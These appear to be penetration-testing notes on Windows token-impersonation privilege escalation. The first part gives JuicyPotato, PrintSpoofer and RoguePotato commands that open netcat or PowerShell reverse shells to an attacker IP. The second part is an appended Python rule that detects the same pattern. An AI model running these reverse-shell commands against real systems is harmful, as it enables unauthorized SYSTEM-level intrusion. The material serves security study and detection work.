SeImpersonate/SeAssignPrimaryToken
SeImpersonatePrivilege allows a process to impersonate the security context of a client that has authenticated to it, which enables privilege escalation whenever a high-privilege token becomes accessible. SeAssignPrimaryTokenPrivilege lets a process assign an arbitrary token as the primary token of a new process, so the new process runs in that token's security context. These privileges are often abused in Windows privilege escalation techniques such as JuicyPotato, RoguePotato, and PrintSpoofer. Exploiting them can grant SYSTEM-level access from a low-privileged account.
SeImpersonate & JuicyPotato
- Transfer JuicyPotato.exe to the target system.
- Find a valid CLSID:
  - Check online lists or use a tool like GetCLSID.ps1
- Execute JuicyPotato:
# PowerShell Base64-Encoded Reverse Shell
JuicyPotato.exe -l <COM-SERVER-LISTENING-PORT> -p powershell.exe -a "<encoded_payload>" -t *
# Netcat Reverse Shell
JuicyPotato.exe -l <COM-SERVER-LISTENING-PORT> -p C:\Windows\System32\cmd.exe -a "/c c:\nc.exe 10.10.10.15 1337 -e cmd.exe" -t *
-l 1337 → Arbitrary listening port
-p cmd.exe → Payload to execute (e.g., a reverse shell)
-t * → Auto-detect token type
-c {CLSID} → COM Server CLSID to abuse
- Confirm SYSTEM access:
whoami
PrintSpoofer & RoguePotato
Tip: Since JuicyPotato for SeImpersonate/SeAssignPrimaryToken doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards, we will use RoguePotato and PrintSpoofer.
- PrintSpoofer
# Netcat Reverse Shell
PrintSpoofer64.exe -c "C:\Path\to\nc.exe -e cmd.exe <ATTACKER_IP> <PORT>" -i
# PowerShell Base64-Encoded Reverse Shell
PrintSpoofer64.exe -c "<POWERSHELL_BASE64_ENCODED>" -i

- RoguePotato
# Netcat Reverse Shell
RoguePotato.exe -r <ATTACKER_IP> -l <LOCAL_PORT> -e "C:\Path\to\nc.exe -e cmd.exe <ATTACKER_IP> <PORT>"
# PowerShell Base64-Encoded Reverse Shell
RoguePotato.exe -r <ATTACKER_IP> -l <LOCAL_PORT> -e "<POWERSHELL_BASE64_ENCODED>"
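As an added defender-side example (not part of these notes or of any of the tools above), the process-creation pattern that JuicyPotato, RoguePotato and PrintSpoofer all share: a process running as a service identity, the kind of account that holds SeImpersonatePrivilege, creating a child that runs as SYSTEM. It assumes Sysmon-style process-creation records with User and ParentUser fields; the sample records, the tool paths inside them and the empty allow-list are constructed.

```python
from typing import Dict, List, Optional, Tuple
SYSTEM = "NT AUTHORITY\\SYSTEM"
# Identities that hold SeImpersonatePrivilege by default, plus the naming
# prefixes of per-service virtual accounts and IIS application pools.
SERVICE_IDENTITIES = {"NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\LOCAL SERVICE"}
SERVICE_PREFIXES = ("NT SERVICE\\", "IIS APPPOOL\\")
# Parents known to legitimately spawn SYSTEM children; fill after baselining (assumed empty).
ALLOWED_PARENTS = set()


def is_service_identity(user: str) -> bool:
    """True if the account is a service identity rather than an interactive user."""
    u = user.upper()
    return u in SERVICE_IDENTITIES or u.startswith(SERVICE_PREFIXES)


def flag_event(ev: Dict) -> Optional[str]:
    """Reason string if a process-creation record shows a service-identity
    parent creating a SYSTEM child (the Potato pattern), else None."""
    if ev.get("EventID") != 1:
        return None
    parent_user = ev.get("ParentUser", "")
    if ev.get("User", "").upper() != SYSTEM or not is_service_identity(parent_user):
        return None
    if ev.get("ParentImage", "").lower() in ALLOWED_PARENTS:
        return None
    return f"{ev['ParentImage']} ({parent_user}) spawned {ev['Image']} as SYSTEM"


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """Apply flag_event to a batch; return (index, reason) for each hit."""
    hits = []
    for i, ev in enumerate(events):
        reason = flag_event(ev)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample records: indices 0 and 3 are escalations, 1 and 2 are benign.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": SYSTEM,
     "ParentImage": "C:\\inetpub\\temp\\tool.exe", "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\conhost.exe", "User": "IIS APPPOOL\\DefaultAppPool",
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "User": SYSTEM,
     "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentUser": SYSTEM},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": SYSTEM,
     "ParentImage": "C:\\Users\\Public\\tool.exe", "ParentUser": "NT SERVICE\\MSSQLSERVER"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The rule fires on the parent/child identity mismatch rather than on tool names, so renamed binaries are still caught; services that legitimately create SYSTEM children go into ALLOWED_PARENTS after baselining.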